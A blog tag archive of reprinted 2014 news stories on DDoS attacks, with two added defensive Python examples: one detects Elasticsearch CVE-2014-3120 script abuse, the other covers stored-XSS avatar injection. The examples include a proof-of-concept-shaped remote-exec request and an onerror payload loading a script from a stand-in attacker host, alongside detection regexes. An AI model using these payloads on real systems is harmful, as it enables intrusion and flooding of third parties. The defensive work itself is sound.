Tag Archives: ddos

DDoS extortion attacks on the rise

While digital ransom attacks come in various types and forms, distributed denial of service (DDoS) attacks top the list of methods attackers use to extort money from targeted companies. So says Bryan Hamman, territory manager of Arbor Networks, who points out that in recent weeks well-known names such as Evernote and Feedly have fallen victim to extortion attacks, and that these companies are just the tip of the iceberg when it comes to this very lucrative criminal activity.

InfoSecurity Magazine reports that this year the number of network time protocol (NTP) amplification attacks, which abuse open NTP servers to reflect and multiply traffic towards a victim, increased by 371.43%, while the average peak DDoS attack volume increased by a staggering 807.48%.

The news aggregator Feedly said it had come under a DDoS attack from cyber criminals which was preventing users from accessing its service. “Criminals are attacking Feedly with a distributed denial of service attack. The attacker is trying to extort money from us to make it stop. We refused to give in and are working with our network providers to mitigate the attack as best as we can,” said Feedly in a blog post.

“‘Pay up or we’ll take your Web site down’, so goes the adage that usually accompanies ransom-based cyber-attacks,” says Hamman. According to Arbor’s ninth annual Worldwide Infrastructure Security Report, DDoS extortion attacks account for 15% of all DDoS attacks. While that may seem a relatively small percentage, as many as 10 000 DDoS attacks occur world-wide every day, and the potential cost in damages and reputation can have a significant impact on a targeted organisation, Hamman points out. He explains that DDoS extortion attacks are generally volumetric, high-bandwidth attacks that aim to take down a company’s Web site or server by bombarding it with packets originating from a large number of geographically distributed bots.

The size of volumetric DDoS attacks continues to increase year on year, and they remain a major threat to enterprises and Internet service providers alike, he adds. “Traditionally, DDoS extortion attacks were used against online gambling sites, around major sporting events. Criminal gangs would initiate attacks that would bring the Web site down just before the event was to start, thus forcing the companies to choose between suffering a major loss in monetary and reputational terms or paying up. Increasingly, however, DDoS attacks are being used to extort money from all sorts of businesses and the reality is that no company should feel safe,” he says.

So what is the right response to extortion demands? Hamman asks. “The answer is simple and always the same – not to give in. Organisations should under no circumstances agree to pay the ransom – it can set a dangerous precedent and encourage more attacks in the future; while it might make the pain go away in the short term, the long-term results are generally not worth it.

“Declining to pay comes, of course, with severe consequences – as we saw from recent attacks on Feedly, who suffered from three separate waves of DDoS attacks. However, the company has now recovered from the attack and is operating as normal. Furthermore, it has been praised for its brave decision by the security community and even its own customers,” says Hamman.

According to Hamman, many companies still rely on reactive measures such as router filters and firewalls, which are inefficient and not sophisticated enough to protect against organised cyber crime. Instead, he says, organisations need to invest in preventive, multi-layered mitigation that combines on-premise and cloud protection and allows for co-operation with their ISP or hosting company. In addition, putting a mitigation strategy in place should the worst happen is of crucial importance, especially as only 17% of organisations globally feel they are fully prepared for a security incident. “By building defences, implementing plans ahead of time and refusing to give in, businesses needn’t feel threatened anymore – attackers wanting to make easy money will have to look elsewhere.”

Source: http://www.itweb.co.za/index.php?option=com_content&view=article&id=136989:DDoS-extortion-attacks-on-the-rise&catid=265

Popcorn Time Hit By Massive DDoS Attack

A major fork of the popular Popcorn Time project is currently being subjected to a massive DDoS attack. The whole project has been hit, from the site hosting its source code through to its CDN, API and DNS servers. The team tells TorrentFreak that the attack amounts to 10Gbps across their entire network.

Every year sees periods when sites in the file-sharing sector are subjected to denial of service attacks. The attackers and their motives are often unknown, and eventually the assaults subside. Early in 2014 many torrent sites were hit, pushing some offline and forcing others to invest in mitigation technology. In May a torrent-related host suffered similar problems. Today it is the turn of the main open source Popcorn Time fork to face the wrath of attackers unknown.

TorrentFreak spoke with members of the project, including ops manager XeonCore, who told us that the attack is massive. “We are currently mitigating a large scale DDoS attack across our entire network. We are currently rerouting all traffic via some of our high bandwidth nodes and are working on imaging and getting our remaining servers back online to help deal with the load,” the team explain.

The attack is project-wide, with huge amounts of traffic hitting all parts of the network, starting with the site hosting the Popcorn Time source code.

Attack on the source code site – 980Mbps

Also under attack are the project’s CDN and API. The graph below shows one of the project’s servers located in France; the green shows the normal traffic from the API server, the blue represents the attack.

Attack on the France API server – 931Mbps

Not even the project’s DNS servers have remained untouched. At one point two of three DNS servers went down, with the third straining under almost 1Gbps of traffic. As a precaution, a fourth DNS server was added to help with the load.

Attack on the Dutch DNS server – peaking at 880Mbps

All told, the whole network is being hit with almost 10Gbps of traffic, but the team is working hard to keep things operational. “We’ve added additional capacity. Our DNS servers are currently back up and running but there is still severe congestion around Europe and America. Almost 10Gbps across the entire network. Still working on mitigating. API is still online for most users!” they conclude.

Nobody has yet claimed responsibility for the attack, and it is certainly possible things will remain that way. Only time will tell when the attack will subside, but the team are determined to keep their project online in the meantime.

Source: http://torrentfreak.com/popcorn-time-hit-by-massive-ddos-attack-140814/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Torrentfreak+%28Torrentfreak%29

RIA Novosti Website Hit by DDoS Attack

RIA Novosti’s website has fallen foul of a distributed denial-of-service (DDoS) attack by hackers, the agency’s IT specialists reported on Sunday. The mobile version of the website is currently inaccessible, and problems with the full version were also reported for a short period of time. The agency’s terminal for clients has not been affected.

Unidentified hackers first attacked the website of InoSMI. When that attack was neutralized, they attempted to disrupt the work of RIA Novosti’s website. IT specialists are now working to eliminate the disruption caused by the attack.

This is not the first cyber attack on the news agency. In May 2012 the RIA Novosti website was hit by a DDoS attack from some 2,500 IP addresses, and another DDoS attack on the agency’s website was carried out in July 2013.

Source: http://en.ria.ru/russia/20140803/191676816/RIA-Novosti-Website-Hit-by-Cyber-Attack.html

Looking at insider threats from the outside

Cybersecurity is a never-ending battle requiring around-the-clock attention. From malware to DDoS to APT attacks, front-line IT security teams are being constantly bombarded. With all this attention o…

Attackers install DDoS bots on Amazon cloud, exploiting Elasticsearch weakness

Attackers are exploiting a vulnerability in the distributed search engine software Elasticsearch to install DDoS malware on Amazon and possibly other cloud servers.

Elasticsearch is an increasingly popular open-source search server written in Java that lets applications perform full-text search over various types of documents through a REST API (representational state transfer application programming interface). Because it has a distributed architecture that allows for multiple nodes, Elasticsearch is commonly used in cloud environments; it can be deployed on Amazon Elastic Compute Cloud (EC2), Microsoft Azure, Google Compute Engine and other cloud platforms.

Versions 1.1.x of Elasticsearch have dynamic scripting, the ability to pass script source code inside API requests, enabled in their default configuration. This feature poses a security risk because the API requires no authentication and the script code is not sandboxed, so a script can call arbitrary Java classes on the node. Security researchers reported earlier this year that attackers can exploit this scripting capability to execute arbitrary code on the underlying server; the issue is tracked as CVE-2014-3120 in the Common Vulnerabilities and Exposures (CVE) database. Elasticsearch’s developers have not released a patch for the 1.1.x branch, but starting with version 1.2.0, released on May 22, dynamic scripting is disabled by default.

Last week security researchers from Kaspersky Lab found new variants of Mayday, a Trojan program for Linux that is used to launch distributed denial-of-service (DDoS) attacks. The malware supports several DDoS techniques, including DNS amplification. One of the new Mayday variants was found running on compromised Amazon EC2 instances, but this is not the only platform being misused, Kaspersky Lab researcher Kurt Baumgartner said in a blog post on Friday.

The attackers break into EC2 instances, virtual machines run by Amazon EC2 customers, by exploiting CVE-2014-3120 in Elasticsearch 1.1.x, which is still used by some organizations in active commercial deployments despite having been superseded by Elasticsearch 1.2.x and 1.3.x, Baumgartner said.

The Kaspersky researchers managed to observe the early stages of the Elasticsearch attacks on EC2. They said the attackers modified publicly available proof-of-concept exploit code for CVE-2014-3120 and used it to install a Perl-based Web shell, a backdoor script that allows remote attackers to execute Linux shell commands over the Web. The script, detected by Kaspersky products as Backdoor.Perl.RShell.c, is then used to download the new version of the Mayday DDoS bot, detected as Backdoor.Linux.Mayday.g.

The Mayday variant seen on compromised EC2 instances did not use DNS amplification and only flooded sites with UDP traffic. Nevertheless, the attacks forced the targets, which included a large regional bank in the U.S. and a large electronics maker and service provider from Japan, to switch their IP (Internet Protocol) addresses to those of a DDoS mitigation provider, Baumgartner said. “The flow is also strong enough that Amazon is now notifying their customers, probably because of potential for unexpected accumulation of excessive resource charges for their customers,” he said. “The situation is probably similar at other cloud providers.”

Users of Elasticsearch 1.1.x should upgrade to a newer version, and those who require the scripting functionality should follow the security recommendations made by the software’s developers in a blog post on July 9. Because Elasticsearch 1.x has no built-in authentication, an instance whose port 9200 is reachable from the Internet (for example through a permissive EC2 security group) is exposed to anyone who finds it, so restricting network access to the node matters as much as the version running on it.

Source: http://www.networkworld.com/article/2458741/attackers-install-ddos-bots-on-amazon-cloud-exploiting-elasticsearch-weakness.html#tk.rss_all
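One way to find this activity after the fact, as an added example rather than code from Kaspersky or the Elasticsearch project: walk logged REST request bodies for inline scripts that reach into the JVM, and apply the version defaults the article describes to a node's elasticsearch.yml. The sample requests are constructed; the third copies the shape of the public proof of concept with a harmless command. The `script.disable_dynamic` setting is the 1.x knob from the developers' scripting guidance.

```python
"""Added example (not from the article, Kaspersky or Elasticsearch): flag
CVE-2014-3120-style dynamic-script abuse in Elasticsearch 1.x request bodies
and check whether a node's settings leave dynamic scripting enabled."""
import json
import re

# JVM classes and calls that a search script has no legitimate reason to touch.
# Public CVE-2014-3120 proof-of-concept code reached a shell through
# java.lang.Runtime from an MVEL script passed inside `script_fields`.
DANGEROUS = re.compile(
    r"java\.lang\.Runtime|Runtime\.getRuntime|ProcessBuilder|\.exec\(|"
    r"java\.io\.|java\.net\.|Class\.forName|getClass\(\)"
)


def find_scripts(node, path=""):
    """Yield (json_path, source) for every inline script in a request body.
    In 1.x an inline script is a string under a `script` key wherever it
    appears (script_fields, script_score, custom_score, update scripts)."""
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}/{key}"
            if key == "script" and isinstance(value, str):
                yield child, value
            else:
                yield from find_scripts(value, child)
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from find_scripts(value, f"{path}[{i}]")


def inspect_request(method, path, body):
    """Return findings for one logged HTTP request against the REST API."""
    try:
        doc = json.loads(body) if body else {}
    except json.JSONDecodeError:
        return [f"{method} {path}: body is not JSON"]
    findings = []
    for json_path, source in find_scripts(doc):
        hit = DANGEROUS.search(source)
        if hit:
            findings.append(
                f"{method} {path}: script at {json_path} reaches into the JVM "
                f"({hit.group(0)})"
            )
    return findings


def scan(requests):
    """Run inspect_request over (method, path, body) tuples."""
    return [f for method, path, body in requests
            for f in inspect_request(method, path, body)]


def dynamic_scripting_enabled(version, yaml_text):
    """Apply the defaults the article describes (enabled before 1.2.0,
    disabled from 1.2.0) and honour an explicit `script.disable_dynamic`
    line in elasticsearch.yml. Anything other than `true` is treated as
    enabled, the conservative reading for an exposure check."""
    major, minor = (int(x) for x in version.split(".")[:2])
    enabled = (major, minor) < (1, 2)
    for line in yaml_text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line.startswith("script.disable_dynamic"):
            enabled = line.split(":", 1)[1].strip().lower() != "true"
    return enabled


# Constructed sample traffic, not captured data. The third body mirrors the
# shape of the public CVE-2014-3120 proof of concept with a harmless command.
SAMPLE_REQUESTS = [
    ("GET", "/_search", '{"query":{"match":{"title":"ddos"}}}'),
    ("POST", "/logs/_search",
     '{"script_fields":{"kb":{"script":"doc[\'bytes\'].value / 1024"}}}'),
    ("POST", "/_search",
     '{"size":1,"query":{"filtered":{"query":{"match_all":{}}}},'
     '"script_fields":{"exp":{"script":"import java.util.*;import java.io.*;'
     'String s=\\"\\";BufferedReader br=new BufferedReader(new InputStreamReader('
     'Runtime.getRuntime().exec(\\"id\\").getInputStream()));s=br.readLine();s"}}}'),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding)
    print("dynamic scripting on 1.1.1 with default config:",
          dynamic_scripting_enabled("1.1.1", ""))
```

Elasticsearch 1.x does not log request bodies by default, so the records this reads come from a capture point in front of port 9200 (a reverse proxy or a packet capture), which is also where access to the node should be restricted.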

DDoS attacks grow as first DIY kits emerge

Distributed denial of service activity surged by 22 percent over the last quarter, according to a new analysis from Prolexic Technologies, now part of Akamai, putting levels close to those seen in Q1 of this year, when existing DDoS volume and allied records were broken. Alongside the report, Trustwave is reporting the discovery of DIY DDoS kits for sale from just US$ 200 (£118) which give users, apart from a high-bandwidth connection, all they need to stage a wide-scale attack.

Delving into the report reveals a 72 percent increase in the average bandwidth of attacks during the second quarter, along with a shift to reflection-based attacks that abuse common Internet protocols, and the arrival of server-side botnets that exploit web vulnerabilities in Windows and Linux-based systems. The analysis concludes that there have been shifts in the industry targets compared with last quarter’s DDoS activity; the difference in these numbers, says the report, may be due to the different types of malicious actors on the Internet that may be active at any particular time.

“It is clear that the majority of malicious actors preferred to use of volumetric attacks in Q2 – this trend was seen across all verticals. A significant variant in attack vectors by industry was the use of a very sophisticated botnets against financial and media sites,” notes the report, adding that these attacks do not seem to fit the previous patterns and motives of the DDoS criminal ecosystem.

According to Trustwave, meanwhile, its research has revealed that hackers are now selling the Neutrino Bot malware kit, which can be used to infect a large number of computers, create a botnet and launch DDoS attacks against websites and services at will. For US$ 500 (£294), hackers will sell BetaBot 1.6 to all comers, which Trustwave says is a remote access Trojan that can run DDoS attacks and steal sensitive data, passwords and files from infected systems.

Karl Sigler, Trustwave’s threat intelligence manager, said he was unsurprised by the findings. “Supply and demand affects malware markets like they do any market. Even though demand is high, there is an increasing amount of malware competing with each other and this helps drive down the cost. There is also a cost-benefit issue. Criminals look at how much they can make by selling stolen data acquired using the malware. Finally, age plays a role. The longer malware is on the market, the cheaper it tends to get,” he said.

Rob Bamforth, a principal analyst with Quocirca, the business analysis and research house, said that the surge in volumes and incidences of DDoS attacks in the second quarter identified by Akamai suggests a larger number of servers being infected by cyber-criminals, coupled with the fact that many systems ‘out there’ are Windows XP-based, an operating system that became legacy when it reached end-of-life with Microsoft back in April. “It also suggests there is a degree of complacency in the business sector, with many managers saying they do not want to invest extra money in IT security, as they do not see a return. Many businesses are suffering an ongoing squeeze on costs, so a failure to invest in security is understandable, even if it is not the correct approach to take,” he told SCMagazineUK.com.

Nick Mazitelli, a senior consultant with Context Information Security, meanwhile, said that Akamai’s analysis confirms that the widespread dissemination of increasingly capable attacker toolsets is a trend seen right across the threat landscape, from cyber-crime through to state-sponsored attacks and everything in between. “On the one hand this trend is fuelled by the on-going professionalisation and commoditisation of criminal marketplaces, and on the other by increasing levels of interconnection between threat groups of all stripes. Not only does this mean that existing threat groups have access to improved capability, but it also lowers the barrier of entry for newcomers thereby increasing the number of malicious parties active in the landscape – both factors that unavoidably increase the tempo of what is effectively an arms race between attacker and defender,” he said.

“With this increased tempo as background it is important to highlight the necessity of a flexible and adaptable approach to security based on a sound understanding of the threat landscape. In particular those aspects of security concerned with network security monitoring as well as incident response are areas that have often been overlooked in the past, but are critical components of effectively managing the risk and minimising the potential impact of these constantly evolving threats,” he added.

Source: http://www.scmagazineuk.com/ddos-attacks-grow-as-first-diy-kits-emerge/article/362573/

#OpSaveGaza: Anonymous Takes Down 1,000 Israeli Government and Business Websites

Hacker collective Anonymous has announced that it has taken down over a thousand Israeli websites in a large new coordinated cyber-attack called #OpSaveGaza, carried out on 11 July and 17 July in support of the people of Palestine. Some of the websites, such as the Tel Aviv Police Department’s online presence, are still offline two days after the distributed denial of service (DDoS) attacks, and numerous Israeli government homepages have been replaced by graphics, slogans and auto-playing audio files made by AnonGhost, the team of hackers who coordinated the attack.

The official Israeli government jobs website has had its homepage replaced by a graphic titled “Akincilar”, the Turkish name for the Ottoman Empire’s irregular raiding cavalry.

Akincilar: A graphic and message protesting against the treatment of Palestinians is still replacing the homepage of certain Israeli government websites

A message written in English and Turkish, presumably by Turkish hackers, and accompanied by pictures of Palestinians suffering says: “The Jerusalem cause is Muslims’ fight of honour” and says that people who fight for Palestine are “on the side of Allah”.

Another Israeli government website now bears an AnonGhost graphic and lists the usernames of 38 hackers. An audio file that auto-plays when the page loads plays music and a synthesized newsreader clip, together with a message beseeching human rights organisations, hackers and activists to attack Israeli websites and become the “cyber shield, the voice for the forgotten people”.

AnonGhost’s #OpSaveGaza message has been displayed on many Israeli websites

Many of the websites have since been restored. The hackers have also leaked lists of Israeli government email addresses obtained by hacking the websites of the Ministry of Immigrant Absorption, the Ministry of Justice, the Ministry of Culture and Sport, the Ministry of Housing and Construction and more.

Israeli websites belonging to restaurants, local businesses, associations, societies, academic foundations and even a symphony orchestra were also attacked, as was a subdomain belonging to MSN Israel. A message on the main Pastebin page and on some of the hacked websites reads: “The act of launching rockets from Gaza sector to Israhell is an acceptable and normal reaction against those pigs, it’s called Resistance and not terrorism. “Israhell never existed its only Palestine, it’s our home. If you are a Hacker, Activist, a Human Right Organisation then hack israel websites and expose to the world their crimes, show to the world how much blood is on their hands, blood of innocent children and women.”

Anonymous previously ran a smaller campaign against Israeli websites in April. About 500 websites went offline during the OpIsrael campaign, and the hackers released the phone numbers and email addresses of some Israeli officials.

Source: http://www.ibtimes.co.uk/opsavegaza-anonymous-takes-down-1000-israeli-government-business-websites-1457269

“Chinese YouTube” Used as DDoS attack Machine

Even the biggest websites in the world are vulnerable to DDoS. Want proof? Throughout this past April, a hacker took advantage of a hole in Sohu.com’s security to launch persistent cross-site scripting (XSS) based DDoS attacks against various targets across the globe. Sohu.com, in case you don’t know, is one of the largest websites in the world, the 24th largest according to Alexa’s Top 100 ranking. But for all its size and multi-billion dollar net worth, Sohu could be exploited by a hacker who managed to convert its popularity into a massive, persistent-XSS-enabled DDoS attack.

Devastating New DDoS Attack Method

At its basis, persistent (stored) XSS is a type of malicious code injection in which the attacker gets a server to store attacker-supplied data and then serve it, unescaped, to every browser that later loads the page. In this attack, the hacker stored on Sohu’s server a JavaScript payload that runs a DDoS tool. To do this, he placed the malicious script in the avatar image of a fabricated user profile. As with most video sites, this infected profile picture would then show up next to any comment written by that profile on Sohu’s video pages. The script hijacked every browser that loaded a video page carrying the infected comment and forced it to send traffic to the target site: it was programmed to issue a GET request to the target once a second. Imagine thousands of users watching a video on Sohu, each sending a malicious GET request every second. These requests add up quickly, reaching hundreds of thousands or even millions every minute. The hacker was also smart enough to post the infected comment on the most popular and longest-playing videos, so that viewers would rack up DDoS requests even faster. This large security event goes to show that even powerful websites can be manipulated by hackers.

Where Will the Next Attack Come From?

It’s difficult to say. This case study shows that hackers will use whatever means necessary to take down their targets. Without third-party protection services, most websites can only defend against what they have seen already; they can only react after they have been hit. In this instance, the hacker was clever enough to fly under the radar and avoid detection by Sohu’s watchful IT team. Had the hacker chosen a target without a DDoS protection service, Sohu might still be a giant DDoS machine causing havoc on innocent websites.

Source: http://www.economicvoice.com/chinese-youtube-used-as-ddos-machine/
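The injection path the article describes, as an added example that is not Sohu’s code (which was never published): the raw-concatenation rendering that lets a stored avatar value break out of its attribute, beside a hardened renderer and a scan for profiles already seeded with handlers. The CDN host, the default image path and the script URL are hypothetical, and the once-a-second flood script itself is deliberately not reproduced.

```python
"""Added example (not Sohu's code): the stored-XSS pattern behind a
comment-avatar injection, beside a hardened renderer and a scan for
already-poisoned profiles. Host names and paths are hypothetical."""
import html
import re
from urllib.parse import urlsplit

# Hypothetical allow-list: the only host the site's own avatar uploads live on.
AVATAR_HOSTS = {"img.example-cdn.net"}
DEFAULT_AVATAR = "/static/default-avatar.png"


def render_comment_unsafe(user, text):
    """Vulnerable pattern: profile data stored once, concatenated raw into the
    page for every later visitor. An avatar value that closes the src
    attribute can add an event handler that runs attacker JavaScript."""
    return (f'<div class="comment"><img class="avatar" src="{user["avatar"]}">'
            f'<p>{text}</p></div>')


def safe_avatar_url(url):
    """Accept only http(s) URLs on the avatar CDN; anything else gets the
    default image. This stops javascript: and data: sources and off-site
    script loaders before escaping even comes into play."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or parts.hostname not in AVATAR_HOSTS:
        return DEFAULT_AVATAR
    return url


def render_comment_safe(user, text):
    """Hardened renderer: validate the URL, then attribute-escape it, and
    escape the comment body so neither field can break out of its context."""
    src = html.escape(safe_avatar_url(user["avatar"]), quote=True)
    return (f'<div class="comment"><img class="avatar" src="{src}">'
            f'<p>{html.escape(text)}</p></div>')


# Markup or handler syntax that never belongs in a stored image URL.
INJECTION = re.compile(r'["\'<>]|\bon\w+\s*=|^\s*(javascript|data):', re.I)


def poisoned_profiles(profiles):
    """Return ids of stored profiles whose avatar field carries an injection
    attempt, for cleaning up a site that has already been seeded."""
    return [p["id"] for p in profiles if INJECTION.search(p["avatar"])]


# Constructed sample data. The script URL is hypothetical; its payload (the
# once-a-second GET loop the article describes) is not reproduced here.
PAYLOAD = ('x" onerror="var s=document.createElement(\'script\');'
           's.src=\'//evil.example/flood.js\';document.body.appendChild(s)')
PROFILES = [
    {"id": 1, "avatar": "https://img.example-cdn.net/u/1.png"},
    {"id": 2, "avatar": PAYLOAD},
    {"id": 3, "avatar": 'https://img.example-cdn.net/a.png" onerror="alert(1)'},
]

if __name__ == "__main__":
    print(render_comment_unsafe(PROFILES[1], "nice video"))
    print(render_comment_safe(PROFILES[1], "nice video"))
    print("poisoned profile ids:", poisoned_profiles(PROFILES))
```

Profile 3 shows why validation alone is not enough: its URL passes the host check, so it is the attribute escaping that keeps the injected handler inert. A Content-Security-Policy header with `script-src 'self'` adds a second layer, since a payload that does slip through still cannot load its flood script from another origin.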

Botnets gain 18 infected systems per second

“According to industry estimates, botnets have caused over $9 billion in losses to US victims and over $110 billion in losses globally. Approximately 500 million computers are infected globally each y…
